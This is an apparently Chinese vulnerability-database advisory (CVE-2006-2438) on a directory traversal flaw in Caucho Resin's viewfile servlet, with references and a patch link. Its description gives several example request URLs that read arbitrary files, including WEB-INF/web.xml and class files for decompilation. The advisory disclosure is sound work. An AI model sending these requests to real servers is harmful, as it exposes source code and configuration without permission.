Caucho Resin viewfile程序组件目录遍历漏洞

CNNVD-ID编号	CNNVD-200605-330
CVE编号	CVE-2006-2438
发布时间	2006-05-17
更新时间	2006-05-18
漏洞类型	路径遍历
漏洞来源	Joseph Pierini joep@scanalert.com
危险等级	中危
威胁类型	远程
厂商	caucho_technology

漏洞介绍

Resin是一款由Caucho Technology开发的WEB服务器，可使用在Microsoft Windows操作系统下。

Resin的某个CGI程序实现上存在输入验证漏洞，远程攻击者可能利用此漏洞读取Web主目录下的任意文件，包括JSP源码或类文件。

默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet：

http：//targetsystem/resin-doc/viewfile/?contextpath=\\%2Fresin-doc\\%2Fjmx\\%2Ftutorial\\%2Fbasic ＆servletpath=\\%2Findex.xtp ＆file=index.jsp ＆re-marker= ＆re-start= ＆re-end=＃code-highlight

viewfile servlet可以无需参数在Web主目录中浏览任意文件：

http：//targetsystem/resin-doc/viewfile/?file=index.jsp

攻击者可以设置resin-doc外的上下文路径，读取其他Web主目录的任意文件：

http：//targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp ＆servletpath= ＆file=WEB-INF/web.xml

如果系统中安装了resin-doc就可能读取Web主目录中的所有文件，包括类文件，然后可以反编译这些文件浏览Java源代码：

http：//targetsystem/resin-doc/viewfile/?contextpath=/ ＆servletpath= ＆file=WEB-INF/classes/com/webapp/app/target.class

请求中错误的路径还会泄漏安装的绝对路径：

File not found

/C：/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class

漏洞补丁

目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接： http://www.caucho.com/download/

参考网址

来源: BID

名称: 18007

链接：http://www.securityfocus.com/bid/18007
来源: BUGTRAQ

名称: 20060516 ScanAlert Security Advisory

链接：http://www.securityfocus.com/archive/1/434145
来源: VUPEN

名称: ADV-2006-1831

链接：http://www.frsirt.com/english/advisories/2006/1831
来源: XF

名称: resin-viewfile-file-disclosure(26494)

链接：http://xforce.iss.net/xforce/xfdb/26494
来源: OSVDB

名称: 25571

链接：http://www.osvdb.org/25571
来源: SECTRACK

名称: 1016110

链接：http://securitytracker.com/id?1016110
来源: SREASON

名称: 908

链接：http://securityreason.com/securityalert/908
来源: SECUNIA

名称: 20125

链接：http://secunia.com/advisories/20125

受影响实体

信息来源